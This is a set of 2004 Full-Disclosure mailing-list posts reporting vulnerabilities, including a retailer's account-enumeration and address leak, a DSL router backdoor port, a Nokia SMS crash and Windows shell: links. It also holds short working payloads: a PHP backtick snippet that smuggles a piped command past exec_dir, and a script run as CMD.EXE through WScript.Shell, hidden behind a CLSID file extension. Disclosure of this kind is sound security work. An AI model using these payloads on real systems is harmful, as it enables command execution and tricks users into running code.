I. SUMMARY The Chapters/Indigo website (http://www.chapters.indigo.ca/) is vulnerable to user name guessing at the login screen and personal information leaks (name and address) in the Wish List function. II. BACKGROUND Chapters/Indigo is the largest book vendor in Canada, having over C$800M in annual revenue in the 12 months ending April, 2004. The www.chapters.indigo.ca website offers books, CDs, DVDs, videos, and a variety of gifts and jewelry for sale over the Internet. III. IMPACT Determining a matching username and password is very difficult. However, guessing one or the other on its own is several orders of magnitude easier. The system is nice enough to allow an attacker to work first at getting user names, and them to attempt to guess passwords for the valid names. Once a valid combination is found, the attacker has full access to the user's account and can order items, have them shipped to alternate overseas addreasses, steal credit card information, etc.. A wish list is keyed to an email address. If an attacker knows a user's email address, they can use the wish list to determine the user's full name and address. There is no warning that the website will give out this information to arbitrary third parties. As a matter of fact, when the user enters their personal information, they are repeatedly assured that their personal information will be secure. III. VENDOR NOTIFICATION Chapters/Indigo was originally notified in November, 2003. There was some discussion via email in an attempt to convince them that this was not simply a user error. After several exchanges, they still would not acknowledge that there was a problem, but they did indicate that management had been informed of the situation and that the website would be updated to be more user friendly. As of July 6, 2004, the problems still exist. IV. SAMPLE EXPLOITS 1. User Name Leak in Login Screen User names at www.chapters.indigo.ca are based on email addresses. At the login page, by typing in a valid email address and invalid password, the error the password entered is not correct is displayed. If an invalid email address and some random (non-blank) password in entered, the error the e-mail address provided cannot be found is displayed. 2. Personal Information Leak it Wish List Function Equiped with a list of valid user names, an attacker may be able to obtain additional personal information about users. If a user has created a Wish List, then anybody can view it, simply by entering the user's email address. The wish list not only displays the user's list of desired products, it also allows anybody to purchase those products for the user. If an item is selected from the Wish List and then the attacker proceeds to check out, the website will display the user's full name and address as confirmation of the destination for shipping. This is *not* the name and address from the attacker's profile. This is the name and address of the Wish List owner, which was obtained simply by knowing the user's email address. V. WORKAROUNDS 1. User Name Leak in Login Screen Find a new online retailer for your books etc.. 2. Personal Information Leak it Wish List Function Remove the shipping address from the wish list. This can be done by following the manage wish list link. The default is to present the user's last used shipping information, but this can be overridden to be any arbitrary address, including null. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: backdoor menu on conexant chipset dsl router (Zoom X3)
Citando Adam Laurie [EMAIL PROTECTED]: i have just installed an adsl modem sold under the brand of Zoom X3 http://www.zoom.com/products/adsl_overview.html and was apalled to find that an nmap scan of the external address immediately came up with the following: PORTSTATE SERVICE 23/tcp open telnet 80/tcp open http 254/tcp open unknown 255/tcp open unknown ports 23 and 80 give access to the configuration menu and html interface as would be expected, but, although you can control access to the html interface, there is no control over the telnet port other than password. worse still, telnetting to port 254 gives you access to another menu, which identifies itself as ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.27, and uses the *DEFAULT* HTML management password, even if you have changed it to something else. i.e. changing the HTML password does not change this one. from this menu you can change DSL settings and issue a complete Factory Reset. there is a menu option to change the password, but this does not appear to work. port 255 accepts connections, but I have not investigated further. at the minimum this carries a risk of a trivial DOS attack (factory reset and everthing stops working), and may actually have other more serious implications. i am disgusted that in this day and age products like this are still being shipped with such basic insecurities, and, accordingly, will not be wasting my time by looking into it any further, and will be taking the router back and exchanging it for something (hopefully) better thought out. to their credit, Zoom responded immediately with a workaround when i reported the problem, so they are clearly already aware. fyi, the workaround is to create dummy Virtual Servers on each of the ports that blackhole any incoming connections. this appears to work. connexant list several other high profile retail modem manufacturers and pc oems, so i leave it as an exercise for the reader to work out other manufacturer/vulnerability combinations. http://www.conexant.com/support/md_supportlinks.html enjoy, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 The Storeshttp://www.thebunker.net 2 Bath Road http://www.aldigital.co.uk London W4 1LT mailto:[EMAIL PROTECTED] UNITED KINGDOMPGP key on keyservers Someone please correct me if im wrong but i found reports of this issue that go back to October 2003 ( http://www.securityfocus.com/bid/8765/ ) from reasearch i found that the prob is in the Conexant CX82310-14 chipset with firmware 3.21... O SAPO já está livre de vírus com a Panda Software, fique você também! Clique em: http://antivirus.sapo.pt ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] shell:windows command question
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote: -snip-- centerbrbrimg src=nocigar.gif/center center a href=shell:windows\snakeoil.txtwho goes there/a/center iframe src=http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none [customise as you see fit] http://www.malware.com/stockpump.html --end-- The code above has interest to me. Even in Mozilla the commands below will work. a href=shell:windows\\system32\\calc.exe1/a a href=shell:windows\system32\calc.exe2/a a href=shell:windows\system32\winver.exe4/a Just save them to an .html file and run it. The first one with the double quotes was from bugtraq: Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash http://seclists.org/lists/bugtraq/2004/Mar/0188.html The links below that will run calc as well as winver. It seems it calls windows as a virtual dir because c:\winxp is what I have. I have been playing around to see if cmd.exe will work with it but without luck. This is what is in the registry. HKEY_CLASSES_ROOT\Shell Look in the registry key above. You will find the shell object calls Windows Explorer with a particular set of arguments. %SystemRoot%\Explorer.exe /e,/idlist,%I,%L So this is tied to explorer.exe. This is something involved with the underlying functions of windows and not IE so to speak because it works in Mozilla or from the run line. I'm trying to find out more about the shell: command because I can put a link on a site that seems to run anything in system32 dir. I'd like to see if you can pass parameters to it. Anyone give me more info on the shell:windows command? JP I found an odd behaviour in my mozilla browser, when i try to execute this link: a href=shell:nofile.xulclick here/a (.xul file is a Mozilla XUL Document) When i click on the link, i see many mozilla windows opening and consuming 100% of the CPU. The system became unstable, forcing me to disconnect from my login. I have Mozilla 1.7b and Windows XP sp0. This is not a real security matter, but it's quite annoying. - Komrade - - http://unsecure.altervista.org - ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Fw: php-exec-dir vulnerable?
Php-exec-dir been fixed for those who care. http://kyberdigi.cz/projects/execdir/english.html for those who need english heh Bugs VeNoMouS reported that you can execute commands out of specified directories if you prepend a ';' character to the beginning of the command and try to execute it with the backtick operator. In original safe_mode_exec_dir the backtick operator is turned off, in this patch it is not. Therefore, all the patches listed here were updated with a simple fix that ignores commands to be run through the backtick operator contaning this dangerous character. A warning will be printed to standard output and command will not be run. You are strongly encouraged to download new patch for your version of PHP. The patches listed in section download are correct ones, so check the MD5 of the patch you have to those in the list. All version from 4.3.2 to 4.3.7 (inclusive) were vulnerable. - Original Message - From: C. McCohy [EMAIL PROTECTED] To: VeNoMouS [EMAIL PROTECTED] Sent: Wednesday, July 07, 2004 9:43 PM Subject: Re: php-exec-dir vulnerable? Ok I fixed all patches to all previous and current versions of the patch, description can be found on the project homepage http://kyberdigi.cz/projects/execdir/ Please inform all internet groups you have informed about the bug before. -- Baj ... C. McCohy While you are reading this text, an essential hacking tool is being silently installed on your computer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug
Microsoft HIDES certain types of files from your eyes:
This one is old unpatched "behaviour" ...
If you will create in windows explorer file :
test.txt
with content :
scripta=new ActiveXObject("WSCript.Shell");a.run("CMD.EXE");alert("Hello, I'mSilly Billy!");/script
It will be executed if you will add CLSID to it's name and user double clicks it :
test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
Note:
CLSID will remain hidden (explorer will not show it up in any means)
File name foruser will remain : test.txt
This adds numerous possibilities for viruses to fool end user into safe content.
another filename parsing bug (system evencannot access it) :
By some technics windows still allows to write file on harddisk with funny name like :
test [good one :] .avi
End user will expierence certain difficulties to remove it afterwards from system.
It's name will change to "test [good one", it will have no extension, will show up 0 bytes etc, etc...
Of course .url and .lnkare hidden as well, being "shortcuts" in m$ way. The contents of those files are up to you ... :-)
For example :file "test.url" with this content will open your browser with alert.
[DEFAULT]BASEURL=_javascript_:alert('hello mama !')[InternetShortcut]URL="" mama !')Modified=00027F010505010100
m$ is good for gaming, not for serious work..
- SomeMan.
ALL-NEW
Yahoo! Messenger - so many
all-new ways to express yourself
RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug
Ancient news
http://www.guninski.com/clsidext.html
--jelmer
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Good One
Sent: donderdag 8 juli 2004 1:37
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Microsoft hides certain types of files from your
eyes + some filename parsing bug
Microsoft HIDES certain types of files from your eyes:
This one is old unpatched behaviour ...
If you will create in windows explorer file :
test.txt
with content :
script
a=new ActiveXObject(WSCript.Shell);
a.run(CMD.EXE);
alert(Hello, I'm Silly Billy !);
/script
It will be executed if you will add CLSID to it's name and user double
clicks it :
test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
Note:
CLSID will remain hidden (explorer will not show it up in any means)
File name for user will remain : test.txt
This adds numerous possibilities for viruses to fool end user into safe
content.
another filename parsing bug (system even cannot access it) :
By some technics windows still allows to write file on harddisk with funny
name like :
test [good one :] .avi
End user will expierence certain difficulties to remove it afterwards from
system.
It's name will change to test [good one, it will have no extension, will
show up 0 bytes etc, etc...
Of course .url and .lnk are hidden as well, being shortcuts in m$ way. The
contents of those files are up to you ... :-)
For example : file test.url with this content will open your browser with
alert.
[DEFAULT]
BASEURL=javascript:alert('hello mama !')
[InternetShortcut]
URL=javascript:alert('hello mama !')
Modified=00027F010505010100
m$ is good for gaming, not for serious work..
- SomeMan.
ALL-NEW Yahoo! Messenger - so many all-new ways to express yourself
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] php-exec-dir vulnerable after latest upgrade
?php $blah = `| /bin/ps aux`; echo nl2br($blah); ? ^^ do a |spaceps exploits it again i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside it and i was still able to execute it, you HAVE to do the space after the pipe '|'. - Original Message - From: C. McCohy [EMAIL PROTECTED] To: VeNoMouS [EMAIL PROTECTED] Sent: Wednesday, July 07, 2004 9:43 PM Subject: Re: php-exec-dir vulnerable? Ok I fixed all patches to all previous and current versions of the patch, description can be found on the project homepage http://kyberdigi.cz/projects/execdir/ Please inform all internet groups you have informed about the bug before. -- Baj ... C. McCohy While you are reading this text, an essential hacking tool is being silently installed on your computer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Nokia 3560 Remote DOS
Hello list, I have found a vulnerability with Nokia's 3560 cellular phone, in which anyone may remotely crash the phone's OS, requiring the user to disconnect the battery to restore normal functionality. The attack only requires sending the person a specially crafted text message. This can be done very easily via e-mail or from any capable cell phone. I have only tested this on the 3560, but other models may be vulnerable as well. During the attack, the phone does not emit a new message tone, and the message does not get stored in phone after rebooting. Victims have no way of knowing that they have been attacked. I know this is FD and all, but due to the seriousness of this attack, I would like to notify Nokia before posting full details. Does anyone know of a security contact at Nokia? -Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
